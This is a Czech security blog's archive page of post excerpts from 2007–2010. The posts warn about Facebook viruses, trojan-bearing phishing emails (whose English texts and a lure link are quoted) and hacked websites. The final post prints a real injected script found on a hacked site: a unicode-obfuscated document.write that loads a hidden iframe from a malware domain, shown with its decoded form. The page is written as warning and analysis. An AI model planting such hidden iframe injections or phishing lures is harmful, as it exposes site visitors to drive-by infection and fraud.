Jak poznat rizikovou aplikaci a nepořídit si vir na Facebooku16.5.2010 | Daniel Dočekal | Webdesign, Internet | | | 20456
Facebook je masově využíván tvůrci virů k šíření jejich tvorby - cíl je stejný jako v případě virů přicházejících elektronickou poštou nebo napadající návštěvníky webových stránek - získat přístup k jejich počítači, dostat do něj malware, trojského koně, keylogger či jakékoliv další škodlivé software. A takto získaný počítač používat pro další šíření virů, rozesílání spam a hacking počítačů.
Zjistili jsme, že nelegálně stahujete obsah. Odpojíme vás od Internetu9.2.2010 | Daniel Dočekal | Bezpečnost |
Musím se přiznat, že já bych následující mail automaticky zařadil mezi "jasný podvod" a vůbec bych ho neřešil. Někdo z mých přátel na Facebooku to nemá až tak automatické, takže se mě ptal, jestli to je jako míněno vážně, nebo jestli je to virus. Potěšující na tom je, že ho ta myšlenka o viru (podvodu) napadla.
Your internet access is going to get suspended
The Internet Service Provider Consorcium was made to protect the rights of software authors, artists.
We conduct regular wiretapping on our networks, to monitor criminal acts.
We are aware of your illegal activities on the internet wich were originating from
You can check the report of your activities in the past 6 month that we have attached. We strongly advise you to stop your activities regarding the illegal downloading of copyrighted material of your internet access will be suspended.
Sincerely
ICS Monitoring Team
V příloze, kterou si máte otevřít (ZIP soubor, zpravidla něco jako user-EA49943X-activities.zip, takže zdánlivě vypadá neškodně) je trojský kůň - zpravidla SHEUR.CIKH, theMal/TinyDL-T, Troj/Meredrop-A and Troj/Agent-HQK (Sophos), Backdoor:Win32/Haxdoor (Microsoft). A samotný ISC (Internet Storm Center) k tomu vydal varování - Warning, it's not from us. A Sophos o něm psal taky někdy v září 2008 - Your internet access is going to get suspended - NOT. A vypadá to, že se to zase vrátilo.
27.10.2009 | Daniel Dočekal | Bezpečnost |
Podvržená adresa odesílatele a upozornění na provedenou změnu hesla. Úsměvné je, že "nové" heslo by mělo být uložené v přiloženém ZIP souboru. Podle WebSense se EXE spojí s dalšími servery aby stáhl další kód a připojil počítač k Bredolab botnet. Jinými slovy, pokud se na tohle nachytáte, bude váš počítač plně ovládaný někým jiným a bude používán pro rozesílání spamu, krádeže osobních údajů a útoky na další počítače. Přiložený virus (Facebook_Password_27b6f.exe v mém případě) má několik různých ozančení - Trojan.Downloader.Bredolab.AZ (F-Secure), Packed.Win32.Krap.w (Kaspersky), TrojanDownloader:Win32/Bredolab.X (Microsoft) či Mal/Bred-A (Sophos).
Virus je rozesílán klasicky náhodně formou spamu,nemá nic společného s tím, jestli máte či nemáte účet na Facebook.com.
12.10.2009 | Daniel Dočekal | Bezpečnost | |
Spam filry odchytávají na mých mailech velký počet nového viru, který se snaží přesvědčit ke stažení programu z adresy na internetu a poté spuštění tohoto programu. Co se stane po jeho špuštění snad netřeba ani příliš spekulovat. Kolik lidí se asi nachytá? Variant předmětu je několik, stejně tak jako několik mírně se lišících textů. Kdo si zkusí trochu adrenalinu? A kolik lidí se nachytá?
Patch.exe, který okamžitě dostanete ke stažení, je ve skutečnosti Win32/Zbot.gen - poměrně starý Trojan. Nový antivirus Microsoftu (Microsoft Security Essentials) ho umí chytit :)
Attention!
On October 16, 2009 server upgrade will take place. Due to this
the system may be offline for approximately half an hour.
The changes will concern security, reliability and performance
of mail service and the system as a whole.
For compatibility of your browsers and mail clients with upgraded
server software you should run SSl certificates update procedure.
This procedure is quite simple. All you have to do is just to click
the link provided, to save the patch file and then to run it
from your computer location. That's all.
http://updates.domain_name.secure.cert1.net/core/id=723084466-email-patch107283.aspx
Thank you in advance for your attention to this matter
and sorry for possible inconveniences.
System Administrator
12.5.2009 | Daniel Dočekal | Bezpečnost | |
Reklamní systém Economia a.s, opět napadl virus, podle klasických příznaků jde o stále řádící vlnu útoků na weby prostřednictvím získání jména a hesla pro FTP přístup - nejčastěji proto, že designeři a programátoři heslo k FTP ukládají do programů, které je pak ochotně vydávají virům.
Pokud tedy budete chtít jít na weby Hospodářských novin, Ekonomu či Marketing & Media, tak rozhdně ne bez antiviru a zaplátovaných Windows :)
Napaden je pochopitelně i Respekt (například http://respekt.ihned.cz/scripts/impact/impact.js)
7.2.2008 | Daniel Dočekal | Bezpečnost | | | 6841
Důvěřivý uživatel obohatí svůj počítač o malware sloužící pro sběr poštovních adres pro spamové databáze a odchytávání hesel pro řadu programů (FTP a poštovních klientů).
Web prestižního titulu BusinessWeek.com šířil virus17.1.2008 | Daniel Dočekal | Bezpečnost | | 7711
Virus se šíří (a šířil) i z českých stránek - historický výskyt lze snadno nalézt v Google. Zajímavé je i to, že jde s největší pravděpodobností o kompromitaci prostřednictvím SQL Injection
Náhodný JavaScript pomáhá viru unikat antivirům14.1.2008 | Daniel Dočekal | Bezpečnost | | 8213
Koncept viru útočí na základní podstatu antivirových programů, které většinu virů poznávají podle signatur, částí kódu případně jinak vyjádřitelných neměnných hodnot
Storm už nebude "in", možná příjde Nugache9.1.2008 | Daniel Dočekal | Bezpečnost | | 10458
Nugache byl doposud nezajímavý a neškodný, ale jak upozorňuje Secure Computing, někdo se ho ujal, trochu přepsal a začal s ním podnikat.
Proč ZemePohadek.cz stále obsahuje kód viru? A proč je tomu tak u dalších webů?26.11.2007 | Daniel Dočekal | Webdesign, Internet | | | 19167
Princip je velice jednoduchý. Robot prohledává internet a snaží se dostat k souborům webových serverů. Prolomení hesla do FTP poslouží dokonale, protože potom už stačí pouze změnit HTM/HTML dokumenty.
23.11.2007 | Daniel Dočekal | Bezpečnost | |
Na včerejším vyhlašování Křišťálové Lupy se řešilo i to, proč je www.zemepohadek.cz v Google označována jako web, který může poškodit váš počítač. Taťána Le Moigne, které tenhle web patří, ředitelka českého Google, nevěděla proč, dokonce tam padaly vysvětlení v podobě chyby Google.
Ona to žádná chyba nebude. ZemePohadek.cz je hacknutý web, na který někdo umístil škodlivý kód, který se pomocí exploitů snaží hacknout počítače všech návštěvníků. Je to vcelku prosté a stačí se podívat na konec kódu stránek tohoto webu. Najdete tam toto:
<script type="text/javascript">document.write('\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0074\u0072\u0066\u0066\u0063\u002e\u006f\u0072\u0067\u002f\u0069\u006e\u002e\u0063\u0067\u0069\u003f\u0064\u0065\u0066\u0061\u0075\u006c\u0074\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0030\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0030\u0022\u0020\u0073\u0074\u0079\u006c\u0065\u003d\u0022\u0064\u0069\u0073\u0070\u006c\u0061\u0079\u003a\u006e\u006f\u006e\u0065\u0022\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e')</script>
Asi dost jasně tušíte, že to tam nemá co dělat :) Případné podrobnosti viz například zde. Výsledný script (IFRAME) směřuje na doménu trffc.org, podle Google snadno zjistíte, že je poněkud profláklá.
<iframe width="0" height="0" style="display: none;" src="http://trffc.org/in.cgi?default">
Případně viz též MalwareDomainList. Trffc.org je v současné době (naštěstí) poněkud mimo provoz.
